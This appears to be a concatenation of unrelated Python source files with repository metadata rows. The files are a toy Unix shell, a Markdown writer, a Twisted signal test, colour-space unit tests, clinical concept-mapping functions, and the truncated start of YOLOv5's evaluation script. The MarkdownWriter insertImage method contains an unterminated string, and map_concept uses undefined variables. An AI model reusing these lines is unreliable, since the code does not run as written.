except: # It does not exist
os.write(1, ("cd %s: No such file or directory\n" % args[1]).encode())
elif '<' in args or '>' in args:
reDir(args)
elif '|' in args:
pipe(args)
elif '&' in args:
wait_child = False
else:
rc = os.fork()
if rc < 0:
os.write(2, ("fork failed, returning %d\n" % rc).encode())
sys.exit(1)
elif rc == 0:
executeCommand(args)
sys.exit(0)
else:
if wait_child: #we wait for the child
child_wait = os.wait()
def executeCommand(args): # Executes command
if '/' in args[0]: #for python commands
prog = args[0]
try:
os.execve(prog, args, os.environ)
except FileNotFoundError:
pass #fail smoothly
os.write(2, ("Could not exec. File not Found: %s\n" % args[0]).encode())
sys.exit(1)
for dir in re.split(":", os.environ['PATH']):
program = "%s/%s" % (dir, args[0])
try:
os.execve(program, args, os.environ) #see if program can be executed
except FileNotFoundError:
pass
# error message
os.write(2, ("%s: command not found\n" % args[0]).encode())
sys.exit(0)
def reDir(args):
if '<' in args: #check input
leftProg = args[:args.index('<')]
rightProg = args[args.index('<')+1:]
os.close(0)
os.open(rightProg[0], os.O_RDONLY)
os.set_inheritable(0, True)
args.remove('<')
else:
leftProg = args[:args.index('>')]
rightProg = args[args.index('>')+1:]
os.close(1) #close input fd
os.open(rightProg[0], os.O_CREAT | os.O_WRONLY)
os.set_inheritable(1, True)
args.remove('>')
if '<' in rightProg or '>' in rightProg:
reDir(rightProg)
executeCommand(args)
def pipe(args):
#piping: 2 programs sharing info
leftProg = args[:args.index('|')]
rightProg = args[args.index('|')+1:]
pread, pwrite = os.pipe() #parent write and read
rc = os.fork() #child process
if rc < 0:
os.write(2, ('fork failed, returning %d\n'%rc).encode())
sys.exit(1)
elif rc == 0:
os.close(1)
os.dup(pwrite) #use parent write
os.set_inheritable(1, True)
for fd in (pread, pwrite):
os.close(fd)
executeCommand(leftProg) #left pipe
os.write(2, ('Execution Failed: %s\n' %leftProg[0]).encode())
sys.exit(1)
else:
os.close(0)
os.dup(pread)
os.set_inheritable(0, True)
for fd in (pread, pwrite):
os.close(fd)
if '|' in rightProg:
pipe(rightProg)
executeCommand(rightProg) #left pipe
#incase of error
os.write(2, ('Execution Failed: %s\n' %rightProg[0]).encode())
sys.exit(1)
while True: #this allows shell to always be ready for input
if 'PS1' in os.environ: #if there is custom prompt 1 then it re prints it out
os.write(1, os.environ['PS1'].encode())
else: # we set our own prompt
os.write(1, ('$ ').encode())
try: #error handling with os.read
inpt = os.read(0,1024) #acts like myreadline and passes entirity of what is read
if (len(inpt)>1):#input
inpt = inpt.decode().split('\n')
for i in inpt:
inputHandler(i.split()) #tokenize input
except EOFError:
os.write(1, ('There has been an error').encode())
| 27.564626 | 88 | 0.529615 |
e979fd7cb45f335eebef2014e0e5da308f10ca62 | 2,420 | py | Python | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
] | null | null | null | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
] | null | null | null | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
] | null | null | null | class MarkdownWriter:
def __init__(self):
self.bold = False
self.italic = False
self.code = False
self.autospacing = True
def openFile(self, fileName):
self.file = open(fileName, 'w')
def writeTitle(self, title, size):
title = self.styleWords(title)
for i in range(size):
self.file.write('#')
self.file.write(title)
self.spacing()
def insertImage(self, imagePath):
self.file.write("
self.file.write(imagePath + ")")
self.spacing()
def writeText(self, text):
text = self.styleWords(text)
self.file.write(text)
self.spacing()
def insertLink(self, text, URL):
self.file.write("[" + text + "](" + URL +")")
self.spacing()
def closeFile(self):
self.file.close()
def setBold(self, value):
if value == True:
self.bold = True
else:
self.bold = False
def setItalic(self, value):
if value == True:
self.italic = True
else:
self.italic = False
def setCode(self, value):
if value == True:
self.code = True
else:
self.code = False
def styleWords(self, text):
if self.code == True:
text = "`" + text + "`"
if self.bold == True:
text = "**" + text + "**"
if self.italic == True:
text = "_" + text + "_"
return text
def setAutospacing(self, value):
self.autospacing = value
def insertSpace(self, number = 1):
for i in range(number):
self.file.write("\n")
def spacing(self):
if self.autospacing == True:
self.file.write("\n")
def insertMatrix(self, matrix):
rows = len(matrix)
columns = len(matrix[0])
self.file.write("||")
for i in range(rows):
self.file.write(str(i) + "|")
self.file.write("\n")
self.file.write("|---|")
for i in range(rows):
self.file.write("--- |")
self.file.write("\n")
for i in range(rows):
self.file.write("|**" + str(i) + "**|")
for j in range(columns):
self.file.write( str(matrix[i][j]) + "|")
self.file.write("\n")
def main():
pass
if __name__ == '__main__':
main()
| 24.2 | 57 | 0.497521 |
f2ff108f85defca6a0f4ba79407bea609f4d6475 | 213 | py | Python | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 267 | 2015-03-22T15:23:48.000Z | 2022-03-05T21:57:34.000Z | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 133 | 2015-03-21T15:13:43.000Z | 2021-12-11T23:37:58.000Z | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 119 | 2015-04-28T16:07:10.000Z | 2022-03-18T03:49:48.000Z | import sys, signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
if getattr(signal, "SIGHUP", None) is not None:
signal.signal(signal.SIGHUP, signal.SIG_DFL)
print 'ok, signal us'
sys.stdin.read()
sys.exit(1)
| 23.666667 | 48 | 0.741784 |
6642f49d17e5b917a19843ab85c6b385cf9306f9 | 3,862 | py | Python | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 30 | 2020-10-11T05:47:51.000Z | 2022-03-22T06:05:33.000Z | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 139 | 2020-10-20T15:28:57.000Z | 2022-03-31T23:44:18.000Z | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 3 | 2021-08-29T13:25:12.000Z | 2021-12-22T19:58:11.000Z | """Test Luv library."""
import unittest
from . import util
from coloraide import Color
class TestLuvInputOutput(util.ColorAsserts, unittest.TestCase):
"""Test Luv."""
def test_input_raw(self):
"""Test raw input."""
self.assertColorEqual(Color("luv", [20, 10, -30]), Color('color(--luv 20% 10 -30)'))
def test_color_class(self):
"""Test raw input."""
self.assertColorEqual(Color(Color("luv", [20, 10, -30])), Color('color(--luv 20% 10 -30)'))
def test_color(self):
"""Test color input/output format."""
args = {"color": True}
color = "color(--luv 20% 10 -30)"
self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30)')
color = "color(--luv 20% 10 -30 / 0.5)"
self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30 / 0.5)')
color = "color(--luv 20% 10 -30 / 50%)"
self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30 / 0.5)')
def test_percent(self):
"""Test that percents work properly."""
color = "color(--luv 20% 10 -30 / 100%)"
luv = Color(color)
self.assertEqual("color(--luv 20% 10 -30)", luv.to_string())
color = "color(--luv 20% 10 -30 / 20%)"
luv = Color(color)
self.assertEqual("color(--luv 20% 10 -30 / 0.2)", luv.to_string())
def test_no_alpha(self):
"""Test no alpha."""
color = "color(--luv 20% 10 -30 / 0.2)"
luv = Color(color)
self.assertEqual("color(--luv 20% 10 -30)", luv.to_string(alpha=False))
def test_force_alpha(self):
"""Test force alpha."""
color = "color(--luv 20% 10 -30 / 1)"
luv = Color(color)
self.assertEqual("color(--luv 20% 10 -30 / 1)", luv.to_string(alpha=True))
def test_precision(self):
"""Test precision."""
color = 'color(--luv 20.1234567% 10.1234567 -30.1234567)'
self.assertEqual(Color(color).to_string(), 'color(--luv 20.123% 10.123 -30.123)')
self.assertEqual(Color(color).to_string(precision=3), 'color(--luv 20.1% 10.1 -30.1)')
self.assertEqual(Color(color).to_string(precision=0), 'color(--luv 20% 10 -30)')
self.assertEqual(
Color(color).to_string(precision=-1),
'color(--luv 20.12345669999999842048055143095552921295166015625% 10.1234567000000001968373908312059938907623291015625 -30.12345669999999842048055143095552921295166015625)' # noqa: E501
)
def test_fit(self):
"""Test fit."""
self.assertEqual(
Color('color(--luv -20% 180 -180)').to_string(),
'color(--luv -20% 180 -180)'
)
self.assertEqual(
Color('color(--luv -20% 180 -180)').to_string(fit="clip"),
'color(--luv -20% 180 -180)'
)
self.assertEqual(
Color('color(--luv -20% 180 -180)').to_string(fit=False),
'color(--luv -20% 180 -180)'
)
class TestLuvProperties(util.ColorAsserts, unittest.TestCase):
"""Test Luv."""
def test_lightness(self):
"""Test `lightness`."""
c = Color('color(--luv 90% 50 -20 / 1)')
self.assertEqual(c.lightness, 90)
c.lightness = 80
self.assertEqual(c.lightness, 80)
def test_u(self):
"""Test `u`."""
c = Color('color(--luv 90% 50 -20 / 1)')
self.assertEqual(c.u, 50)
c.u = 40
self.assertEqual(c.u, 40)
def test_v(self):
"""Test `v`."""
c = Color('color(--luv 90% 50 -20 / 1)')
self.assertEqual(c.v, -20)
c.v = -10
self.assertEqual(c.v, -10)
def test_alpha(self):
"""Test `alpha`."""
c = Color('color(--luv 90% 50 -20 / 1)')
self.assertEqual(c.alpha, 1)
c.alpha = 0.5
self.assertEqual(c.alpha, 0.5)
| 31.145161 | 198 | 0.555153 |
341faf50dca4857c37527c1c40b676f716324865 | 17,274 | py | Python | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | '''
Copyright 2017 The Regents of the University of Colorado
Licensed under the Apache License, Version 2.0 (the "License")
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
migrate_functions.py
Python Version: 3.6.3
This is research code for demonstration purposes only.
These functions...
Q: How to denote that each function has a common signautre ???
Q: is it bad to include the return type of the function in the function name conflating functiong with return type?
I think I saw this in the identity fucntion where you need to have for each of the types of values
croeder 7/2017 chris.roeder@ucdenver.edu
croeder 9/2018 gutted, parameterized
croeder 4/2019 resurrected, stuff in person.py not parameterized yet
'''
import sys
import re
import psycopg2
import psycopg2.extras
from psycopg2.extras import RealDictCursor
import logging
import string
import traceback
logger = logging.getLogger(__name__)
def _lookup_concept_id(vocab_id, concept_code, con):
stmt = """ SELECT concept_id
FROM concept c
WHERE c.vocabulary_id = %s and c.concept_code = %s
"""
with con.cursor() as cur:
try:
cur.execute(stmt, (vocab_id, concept_code))
rows = cur.fetchall()
if len(rows) > 0:
return(rows[0][0])
except Exception as e:
print("Error in _lookup_concept_id", vocab_id, concept_code, e)
else:
return None
#############################################################################################
from HeartData.concepts import AFRICAN_AMERICAN_CONCEPT_ID
from HeartData.concepts import CAUCASIAN_CONCEPT_ID
from HeartData.concepts import ASIAN_CONCEPT_ID
from HeartData.concepts import PACIFIC_ISLANDER_CONCEPT_ID
from HeartData.concepts import AMERICAN_INDIAN_CONCEPT_ID
from HeartData.concepts import HISPANIC_CONCEPT_ID
from HeartData.concepts import OTHER_RACE_CONCEPT_ID
from HeartData.concepts import MALE_CONCEPT_ID
from HeartData.concepts import FEMALE_CONCEPT_ID
from HeartData.concepts import YES_CONCEPT_ID
from HeartData.concepts import NO_CONCEPT_ID
from HeartData.concepts import YES_CONCEPT_CODE
from HeartData.concepts import YES_VOCABULARY_ID
from HeartData.concepts import NO_CONCEPT_CODE
from HeartData.concepts import NO_VOCABULARY_ID
from HeartData.concepts import SMOKE_NEVER_CONCEPT_ID
from HeartData.concepts import SMOKE_CURRENT_CONCEPT_ID
from HeartData.concepts import SMOKE_SMOKELESS_CONCEPT_ID
from HeartData.concepts import SMOKE_FORMER_CONCEPT_ID
from HeartData.concepts import BARI2D_RACE_1_CONCEPT_ID
from HeartData.concepts import BARI2D_RACE_2_CONCEPT_ID
# ---- BEST -----
BEST_MALE=1
BEST_FEMALE = 2
BEST_YES=1
BEST_NO=2
# ---- HF-ACTION ---
HF_MEN=1
HF_WOMEN=2
# from the Data_Dictionary.pdf "1=Black, 2=White, 3=Asian, Amer Ind, Pac. Isl"
HF_AFRICAN_AMERICAN=1
HF_CAUCASIAN=2
HF_ASIAN=3
HF_AMERICAN_INDIAN=4
HF_PACIFIC_ISLANDER=5
HF_YES=1
HF_NO=0
HF_YES_12=1
HF_NO_12=2
# -- SCD-HeFT --
SH_YES=1
SH_NO=0
SH_MALE=1
SH_FEMALE=2
SH_AFRICAN_AMERICAN="African American"
SH_CAUCASIAN ="Caucasian"
SH_ASIAN="Asian"
SH_LATIN_AMERICAN ="Latin American"
SH_OTHER="Other"
# -- TOPCAT --
TC_YES=1
TC_NO=0
TC_MALE=1
TC_FEMALE=2
TC_CAUCASIAN =1
TC_AFRICAN_AMERICAN=2
TC_ASIAN=3
TC_OTHER=4
# -- PARADIGM --
P_YES=1
P_NO=0
P_MALE=1
P_FEMALE=2
P_CAUCASIAN =1
P_AFRICAN_AMERICAN=2
P_ASIAN=3
P_OTHER=4
## TBD: ATMOSPHERE TODO
A_CAUCASIAN =1
A_AFRICAN_AMERICAN=2
A_ASIAN=3
A_NATIVE_AMERICAN=7
A_PAC_ISLAND=8
A_OTHER=88
AIMHIGH_OTHER_RACE=8
AIMHIGH_WHITE_RACE=5
AIMHIGH_BLACK_RACE=3
AIMHIGH_ASIAN_RACE=2
AIMHIGH_AM_INDIAN_RACE=1
AIMHIGH_SMOKE_NEVER=1
AIMHIGH_SMOKE_CURRENT=2
AIMHIGH_SMOKELESS=3
AIMHIGH_SMOKE_FORMER=4
###########
# functions in this first batch are not used in migrate, rather by person.py.
# They are deprecated and need to be worked out of usage in person.py
###########
############################################################################################
"""
New function signature
param value - a single value of either number, string, or concept_id (??) type
param mapping - a StudyToOhdsiMapping object
param arguments - a StudyMappingArguments object
param con
"""
def true(_string_value, _mapping, _arguments, con):
"""
Param string_value, unused
Param mapping, unused
Param arguments, unused
Param con, unused
returns concept_id of True
"""
return YES_CONCEPT_ID
def identity(value, _mapping, _arguments, con):
"""
Param string_value, returned
Param mapping, unused
Param arguments, unused
Param con, unused
returns value
"""
return value
def map_string(value, mapping, arguments, con):
""" Converts a string value to a concept using rows from study_mapping_arguments.
See also map_number() and map_concept() below.
Param string_value
Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
Param con, a psycopg2 database connnection
rows: (string_value, number_value, concept_value, map_target, factor, shift)
returns concept_id of vocabulary_id, concept_code of mapped value
"""
concept_pair = None
logger.info("migrate_functions.map_string value:%s mapping:%s", value, mapping)
if (arguments and len(arguments) > 0):
if value is None:
return None
for arg in arguments:
if value == arg['mapped_string']:
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
print(" string --> ", value, arg['mapped_string'])
if (not concept_pair):
logger.error("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
return None
else:
try:
return _lookup_concept_id(concept_pair[0], concept_pair[1], con)
except Exception as e:
logger.error("Concept matching query does not exist \"%s\" \"%s\" value:%s ", concept_pair[0], concept_pair[1], value)
raise e
return None
else:
logger.error("no arguments for migrate_functions.map_string(). mapping: %s, value: %s", mapping, value)
raise Exception("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: {} arg:{} map:{}".format( value, arguments, mapping))
def not_null_number(value, mapping, arguments, con):
"""
A special case of map_number using the sentinel values -1 for null and 1 for non-null to map to two concepts
specified by argument.vocabulary_id, argument.concept_code, and return the corresponding Concept object.
Zero is a special case and requires a third argument. I would have given it the value for null, but the
first time I applied this function, 0 counts as True.
Param value is the value to map to a concept
Param mapping is the row from study_to_ohdsi_mapping
Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
Param con, a psycopg2 database connnection
returns concept id for true or false
"""
concept_pair = None
if (arguments and len(arguments) > 0):
int_value = None
try:
int_value = int(value)
except Exception as e:
pass
for arg in arguments:
if arg:
arg_value = None
try:
arg_value = int(arg['mapped_number'])
except Exception as e:
logger.error("non integer value or mapped_number. None Returned. \"%s\", \"%s\" %s %s",
value, arg['mapped_number'], mapping, arguments)
return None
print(" not null--> ", arg_value, int_value)
if int_value and int_value > 0 and arg_value == 1:
# POSITIVE
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
elif int_value == 0 and arg_value == 0:
# ZERO
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
elif not int_value and arg_value == -1:
# NULL
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
else:
logger.error("no null arg for migrate_functions.map_number(). Check Configuration. mapping: %s, value: %s", mapping, value)
if (not concept_pair):
logger.error("migrate_functions.not_null_number() I think your arguments list for a mapping \
isn't complete. It needs -1, 0, and 1. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
return None
else:
try:
val = _lookup_concept_id(concept_pair[0], concept_pair[1], con)
return val
except Exception as e:
logger.error("can't get concept for %s, %s", concept_pair[0], concept_pair[1])
logger.error("exception:%s", e)
raise e
else:
logger.error("migrate_functions.map_string() I think your arguments list for a mapping \
isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
raise Exception("migrate_functions.map_string() I think your arguments list for a mapping \
isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".\
format( val=value, arg=arguments, mapping=mapping))
def not_null(value, mapping, arguments, con):
"""
This function cares not about the type of the value, just if it is NA/None/Null or not.
I returns false if NA, true otherwise. It requires no arguments.
Param value - the value to map to True or False concepts
Param mapping is the row from study_to_ohdsi_mapping
Param arguments - none expected/used
Param con, a psycopg2 database connnection
returns concept id for true or false
"""
if (value is None):
return NO_CONCEPT_ID
else:
return YES_CONCEPT_ID
def map_number(value, mapping, arguments, con):
"""
Map the passed in value from a matching argument.mapped_Number to the concept
specified by argument.vocabulary_id, argument.concept_code, and return the corresponding Concept object.
Param value is the value to map to a concept
Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
Param con, a psycopg2 database connnection
returns concept_id of vocabulary_id, concept_code of mapped value
"""
concept_pair = None
logger.info("migrate_functions.map_number value:%s mapping:%s", value, mapping)
if (arguments and len(arguments) > 0):
if value is None:
return None
for arg in arguments:
if (arg) :
#try:
#except Exception as e:
# logger.error("non integer value or mapped_number. None Returned. \"%s\", \"%s\" %s %s",
# value, arg['mapped_number'], mapping, arguments)
# return None
int_value = None
try:
int_value = int(value)
except Exception as e:
pass
try:
arg_value = int(arg['mapped_number'])
except Exception as e:
logger.error("non integer value or mapped_number. Check configuration. None Returned. \"%s\", \"%s\" %s %s",
value, arg['mapped_number'], mapping, arguments)
return None
if int_value == arg_value:
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
else:
logger.error("no null arg for migrate_functions.map_number(). Check Configuratin. mapping: %s, value: %s", mapping, value)
if (not concept_pair):
logger.error("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
return None
else:
try:
return _lookup_concept_id(concept_pair[0], concept_pair[1], con)
except Exception as e:
logger.error("can't get concept for %s, %s", concept_pair[0], concept_pair[1])
logger.error("exception:%s", e)
raise e
else:
logger.error("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
raise Exception("migrate_functions.map_number() I think your arguments list for a mapping isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".format( val=value, arg=arguments, mapping=mapping))
def map_concept(value, mapping, arguments, con):
"""
Param string_value
Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
Param con, a psycopg2 database connnection
returns concept_id of mapped vocabulary_id, concpet_code pair
##(_, _, concept_value, map_target, _, _)
"""
concept_pair = None
logger.info("migrate_functions.map_concept value:%s mapping:%s", value, mapping)
if (arguments and len(arguments) > 0):
if value is None:
return None
for arg in arguments:
logger.info("...%s", arg)
print(" concept --> ", arg_value, int_value)
if value == arg.mapped_concept:
concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
if (not concept_pair):
logger.error("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
return None
else:
return _lookup_concept_id(concept_pair[0], concept_pair[1])
else:
logger.error("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
value, arguments, mapping)
raise Exception("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: \"{val}\" \"{arg}\" {mapping}".format( val=value, arg=arguments, mapping=mapping))
def linear_equation(value, mapping, arguments, con):
"""
Param string_value
Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
Param arguments,
Param con, a psycopg2 database connnection
returns float value
"""
return transform(value, mapping, arguments, con)
def transform(value, mapping, arguments, con):
"""
Param string_value
Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
Param arguments,
Param con, a psycopg2 database connnection
be congnizant of the shift happening AFTER the factoring, do your algebra, get it right
Ex. f = 9/5 * c + 32
c = 5/9*(f-32) # not here, rather
c = 5/9*f - 5/9*32 # so your shift value is not 32, rather 5/9*32.
"""
if value is None:
return None
retval = value * float(arguments[0]['transform_factor']) + float(arguments[0]['transform_shift'])
logger.info("LINEAR EQUATION %s * %s + %s :%s", str(value), str(arguments[0]['transform_factor']), str(arguments[0]['transform_shift']), str(retval))
return retval
| 38.730942 | 230 | 0.644031 |
e51a5ed054503cf08f687903b754c4ee5c8d59c8 | 18,399 | py | Python | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | test.py | akshatapagey28/Waste-Material-Recognizer | 78612d779cb7751bd9f3f9717b0c61fbe4015b24 | [
"MIT"
] | null | null | null | """Test a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/test.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a cocoapi-compatible JSON results file
project='runs/test', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
wandb_logger=None,
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t_ = time_synchronized()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t = time_synchronized()
t0 += t - t_
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
t1 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t2 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
